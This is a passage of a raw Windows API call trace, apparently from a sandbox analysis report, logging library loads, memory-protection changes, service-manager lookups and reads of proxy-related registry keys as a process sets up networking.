GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0111.079] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x6ee72c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0111.085] GetProcAddress (hModule=0x77230000, lpProcName="WSAEventSelect") returned 0x7723648f [0111.085] WSAEventSelect (s=0x370, hEventObject=0x374, lNetworkEvents=512) returned 0 [0111.085] WSAIoctl (in: s=0x378, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x6ee9fc, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x6ee9fc, lpOverlapped=0x0) returned -1 [0111.085] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x6ee72c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0111.085] WSAEventSelect (s=0x378, hEventObject=0x37c, lNetworkEvents=512) returned 0 [0111.085] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384 [0111.086] GetProcAddress (hModule=0x746e0000, lpProcName="RasConnectionNotification") returned 0x0 [0111.086] GetProcAddress (hModule=0x746e0000, lpProcName="RasConnectionNotificationW") returned 0x746e31f5 [0111.086] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x384, param_3=0x3) returned 0x0 [0111.087] SysReAllocStringLen (in: pbstr=0x6ee950*=0x0, psz="RASMAN.DLL", len=0xa | out: pbstr=0x6ee950*="RASMAN.DLL") returned 1 [0111.087] CharLowerBuffW (in: lpsz="RASMAN.DLL", cchLength=0xa | out: lpsz="rasman.dll") returned 0xa [0111.087] LoadLibraryW (lpLibFileName="RASMAN.DLL") returned 0x750b0000 [0111.087] GetLastError () returned 0x0 [0111.087] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10a0, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x4, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x20) returned 0x0 [0111.088] GetCurrentProcess () returned 0xffffffff [0111.088] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10a0, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x20, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x4) returned 0x0 [0111.088] GetCurrentProcess () returned 0xffffffff [0111.088] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10ac, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x4, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x20) returned 0x0 [0111.088] GetCurrentProcess () returned 0xffffffff [0111.088] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10ac, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x20, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x4) returned 0x0 [0111.089] GetCurrentProcess () returned 0xffffffff [0111.089] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10b0, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x4, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x20) returned 0x0 [0111.089] GetCurrentProcess () returned 0xffffffff [0111.089] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10b0, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x20, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x4) returned 0x0 [0111.089] GetCurrentProcess () returned 0xffffffff [0111.089] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10b4, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x4, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x20) returned 0x0 [0111.090] GetCurrentProcess () returned 0xffffffff [0111.090] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10b4, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x20, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x4) returned 0x0 [0111.090] GetCurrentProcess () returned 0xffffffff [0111.090] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10b8, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x4, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x20) returned 0x0 [0111.090] GetCurrentProcess () returned 0xffffffff [0111.090] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10b8, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x20, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x4) returned 0x0 [0111.090] GetCurrentProcess () returned 0xffffffff [0111.090] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10bc, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x4, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x20) returned 0x0 [0111.090] GetCurrentProcess () returned 0xffffffff [0111.091] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10bc, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x20, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x4) returned 0x0 [0111.091] GetCurrentProcess () returned 0xffffffff [0111.091] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10d4, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x4, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x20) returned 0x0 [0111.091] GetCurrentProcess () returned 0xffffffff [0111.091] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b10d4, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x20, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x4) returned 0x0 [0111.091] GetCurrentProcess () returned 0xffffffff [0111.091] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b1108, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x4, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x20) returned 0x0 [0111.091] GetCurrentProcess () returned 0xffffffff [0111.091] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b1108, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x20, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x4) returned 0x0 [0111.092] GetCurrentProcess () returned 0xffffffff [0111.092] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b113c, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x4, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x20) returned 0x0 [0111.092] GetCurrentProcess () returned 0xffffffff [0111.092] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee930*=0x750b113c, NumberOfBytesToProtect=0x6ee934, NewAccessProtection=0x20, OldAccessProtection=0x6ee968 | out: BaseAddress=0x6ee930*=0x750b1000, NumberOfBytesToProtect=0x6ee934, OldAccessProtection=0x6ee968*=0x4) returned 0x0 [0111.093] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ad4, cbMultiByte=11, lpWideCharStr=0x6ed854, cchWideChar=2047 | out: lpWideCharStr="rtutils.dlln?nථ盂\x01") returned 11 [0111.093] SysReAllocStringLen (in: pbstr=0x6ee858*=0x0, psz="rtutils.dll", len=0xb | out: pbstr=0x6ee858*="rtutils.dll") returned 1 [0111.093] CharLowerBuffW (in: lpsz="rtutils.dll", cchLength=0xb | out: lpsz="rtutils.dll") returned 0xb [0111.093] LoadLibraryExA (lpLibFileName="rtutils.dll", hFile=0x0, dwFlags=0x0) returned 0x746d0000 [0111.093] GetLastError () returned 0x0 [0111.093] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1044, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.094] GetCurrentProcess () returned 0xffffffff [0111.094] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1044, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.094] GetCurrentProcess () returned 0xffffffff [0111.094] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1064, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.094] GetCurrentProcess () returned 0xffffffff [0111.094] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1064, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.094] GetCurrentProcess () returned 0xffffffff [0111.095] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1090, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.095] GetCurrentProcess () returned 0xffffffff [0111.095] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1090, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.095] GetCurrentProcess () returned 0xffffffff [0111.095] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1094, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.095] GetCurrentProcess () returned 0xffffffff [0111.096] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1094, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.096] GetCurrentProcess () returned 0xffffffff [0111.096] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d10ac, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.096] GetCurrentProcess () returned 0xffffffff [0111.096] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d10ac, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.096] GetCurrentProcess () returned 0xffffffff [0111.097] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d10bc, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.097] GetCurrentProcess () returned 0xffffffff [0111.097] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d10bc, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.097] GetCurrentProcess () returned 0xffffffff [0111.097] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d10e4, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.098] GetCurrentProcess () returned 0xffffffff [0111.098] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d10e4, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.098] GetCurrentProcess () returned 0xffffffff [0111.098] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d10f8, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.098] GetCurrentProcess () returned 0xffffffff [0111.098] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d10f8, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.098] GetCurrentProcess () returned 0xffffffff [0111.098] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1140, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.099] GetCurrentProcess () returned 0xffffffff [0111.099] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1140, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.099] GetCurrentProcess () returned 0xffffffff [0111.099] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1158, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.099] GetCurrentProcess () returned 0xffffffff [0111.099] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1158, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.099] GetCurrentProcess () returned 0xffffffff [0111.099] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d115c, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.100] GetCurrentProcess () returned 0xffffffff [0111.100] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d115c, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.100] GetCurrentProcess () returned 0xffffffff [0111.100] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1164, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x4, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x20) returned 0x0 [0111.100] GetCurrentProcess () returned 0xffffffff [0111.100] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee844*=0x746d1164, NumberOfBytesToProtect=0x6ee848, NewAccessProtection=0x20, OldAccessProtection=0x6ee87c | out: BaseAddress=0x6ee844*=0x746d1000, NumberOfBytesToProtect=0x6ee848, OldAccessProtection=0x6ee87c*=0x4) returned 0x0 [0111.101] GetProcAddress (hModule=0x746d0000, lpProcName="TraceRegisterExA") returned 0x746d2305 [0111.103] GetProcAddress (hModule=0x746d0000, lpProcName="TracePrintfExA") returned 0x746d1b2d [0111.105] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=36, lpWideCharStr=0x6ed87c, cchWideChar=2047 | out: lpWideCharStr="API-MS-WIN-Service-winsvc-L1-1-0.dllޠ") returned 36 [0111.105] SysReAllocStringLen (in: pbstr=0x6ee880*=0x0, psz="API-MS-WIN-Service-winsvc-L1-1-0.dll", len=0x24 | out: pbstr=0x6ee880*="API-MS-WIN-Service-winsvc-L1-1-0.dll") returned 1 [0111.105] CharLowerBuffW (in: lpsz="API-MS-WIN-Service-winsvc-L1-1-0.dll", cchLength=0x24 | out: lpsz="api-ms-win-service-winsvc-l1-1-0.dll") returned 0x24 [0111.105] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-winsvc-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0111.106] GetLastError () returned 0x0 [0111.106] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee86c*=0x76d11074, NumberOfBytesToProtect=0x6ee870, NewAccessProtection=0x4, OldAccessProtection=0x6ee8a4 | out: BaseAddress=0x6ee86c*=0x76d11000, NumberOfBytesToProtect=0x6ee870, OldAccessProtection=0x6ee8a4*=0x20) returned 0x0 [0111.106] GetCurrentProcess () returned 0xffffffff [0111.106] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee86c*=0x76d11074, NumberOfBytesToProtect=0x6ee870, NewAccessProtection=0x20, OldAccessProtection=0x6ee8a4 | out: BaseAddress=0x6ee86c*=0x76d11000, NumberOfBytesToProtect=0x6ee870, OldAccessProtection=0x6ee8a4*=0x4) returned 0x0 [0111.106] GetCurrentProcess () returned 0xffffffff [0111.106] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee86c*=0x76d11088, NumberOfBytesToProtect=0x6ee870, NewAccessProtection=0x4, OldAccessProtection=0x6ee8a4 | out: BaseAddress=0x6ee86c*=0x76d11000, NumberOfBytesToProtect=0x6ee870, OldAccessProtection=0x6ee8a4*=0x20) returned 0x0 [0111.107] GetCurrentProcess () returned 0xffffffff [0111.107] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee86c*=0x76d11088, NumberOfBytesToProtect=0x6ee870, NewAccessProtection=0x20, OldAccessProtection=0x6ee8a4 | out: BaseAddress=0x6ee86c*=0x76d11000, NumberOfBytesToProtect=0x6ee870, OldAccessProtection=0x6ee8a4*=0x4) returned 0x0 [0111.107] GetProcAddress (hModule=0x76d10000, lpProcName="OpenSCManagerA") returned 0x76d164f0 [0111.107] GetCurrentThreadId () returned 0xb0c [0111.107] ResetEvent (hEvent=0xb8) returned 1 [0111.107] GetCurrentThreadId () returned 0xb0c [0111.107] GetCurrentThreadId () returned 0xb0c [0111.107] GetCurrentThreadId () returned 0xb0c [0111.107] GetCurrentThreadId () returned 0xb0c [0111.107] ResetEvent (hEvent=0xb8) returned 1 [0111.108] GetCurrentThreadId () returned 0xb0c [0111.108] GetCurrentThreadId () returned 0xb0c [0111.108] SetEvent (hEvent=0xbc) returned 1 [0111.108] SetEvent (hEvent=0xb8) returned 1 [0111.108] CloseHandle (hObject=0x39c) returned 1 [0111.108] GetProcAddress (hModule=0x76d10000, lpProcName="OpenServiceA") returned 0x76d17245 [0111.109] GetProcAddress (hModule=0x76d10000, lpProcName="QueryServiceStatus") returned 0x76d14e4b [0111.109] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=40, lpWideCharStr=0x6ed880, cchWideChar=2047 | out: lpWideCharStr="API-MS-WIN-Service-Management-L1-1-0.dll?n矆ᝌ") returned 40 [0111.109] SysReAllocStringLen (in: pbstr=0x6ee884*=0x0, psz="API-MS-WIN-Service-Management-L1-1-0.dll", len=0x28 | out: pbstr=0x6ee884*="API-MS-WIN-Service-Management-L1-1-0.dll") returned 1 [0111.109] CharLowerBuffW (in: lpsz="API-MS-WIN-Service-Management-L1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-service-management-l1-1-0.dll") returned 0x28 [0111.109] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0111.110] GetLastError () returned 0x0 [0111.110] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee870*=0x76d11074, NumberOfBytesToProtect=0x6ee874, NewAccessProtection=0x4, OldAccessProtection=0x6ee8a8 | out: BaseAddress=0x6ee870*=0x76d11000, NumberOfBytesToProtect=0x6ee874, OldAccessProtection=0x6ee8a8*=0x20) returned 0x0 [0111.110] GetCurrentProcess () returned 0xffffffff [0111.110] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee870*=0x76d11074, NumberOfBytesToProtect=0x6ee874, NewAccessProtection=0x20, OldAccessProtection=0x6ee8a8 | out: BaseAddress=0x6ee870*=0x76d11000, NumberOfBytesToProtect=0x6ee874, OldAccessProtection=0x6ee8a8*=0x4) returned 0x0 [0111.110] GetCurrentProcess () returned 0xffffffff [0111.110] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee870*=0x76d11088, NumberOfBytesToProtect=0x6ee874, NewAccessProtection=0x4, OldAccessProtection=0x6ee8a8 | out: BaseAddress=0x6ee870*=0x76d11000, NumberOfBytesToProtect=0x6ee874, OldAccessProtection=0x6ee8a8*=0x20) returned 0x0 [0111.111] GetCurrentProcess () returned 0xffffffff [0111.111] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee870*=0x76d11088, NumberOfBytesToProtect=0x6ee874, NewAccessProtection=0x20, OldAccessProtection=0x6ee8a8 | out: BaseAddress=0x6ee870*=0x76d11000, NumberOfBytesToProtect=0x6ee874, OldAccessProtection=0x6ee8a8*=0x4) returned 0x0 [0111.111] GetProcAddress (hModule=0x76d10000, lpProcName="CloseServiceHandle") returned 0x76d14dc3 [0111.111] GetProcAddress (hModule=0x76d10000, lpProcName="CloseServiceHandle") returned 0x76d14dc3 [0111.112] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenCurrentUser") returned 0x777215ad [0111.112] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0111.112] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x6eea28 | out: phkResult=0x6eea28*=0x39c) returned 0x0 [0111.113] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyEx") returned 0x0 [0111.113] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0111.113] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ee9d8 | out: phkResult=0x6ee9d8*=0x3a0) returned 0x0 [0111.114] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a4 [0111.114] GetProcAddress (hModule=0x77710000, lpProcName="RegNotifyChangeKeyValue") returned 0x7771e15b [0111.114] RegNotifyChangeKeyValue (hKey=0x3a0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3a4, fAsynchronous=1) returned 0x0 [0111.115] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyEx") returned 0x0 [0111.115] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0111.115] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ee9dc | out: phkResult=0x6ee9dc*=0x3a8) returned 0x0 [0111.116] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ac [0111.116] RegNotifyChangeKeyValue (hKey=0x3a8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3ac, fAsynchronous=1) returned 0x0 [0111.116] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ee9dc | out: phkResult=0x6ee9dc*=0x3b0) returned 0x0 [0111.116] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b4 [0111.116] RegNotifyChangeKeyValue (hKey=0x3b0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3b4, fAsynchronous=1) returned 0x0 [0111.116] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee9d0 | out: TokenHandle=0x6ee9d0*=0x3b8) returned 1 [0111.118] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ee2e0 | out: phkResult=0x6ee2e0*=0x3bc) returned 0x0 [0111.118] RegQueryValueExW (in: hKey=0x3bc, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x6ee2fc, lpData=0x0, lpcbData=0x6ee2f8*=0x0 | out: lpType=0x6ee2fc*=0x0, lpData=0x0, lpcbData=0x6ee2f8*=0x0) returned 0x2 [0111.118] RegCloseKey (hKey=0x3bc) returned 0x0 [0111.119] SysReAllocStringLen (in: pbstr=0x6edde4*=0x0, psz="winhttp.dll", len=0xb | out: pbstr=0x6edde4*="winhttp.dll") returned 1 [0111.120] CharLowerBuffW (in: 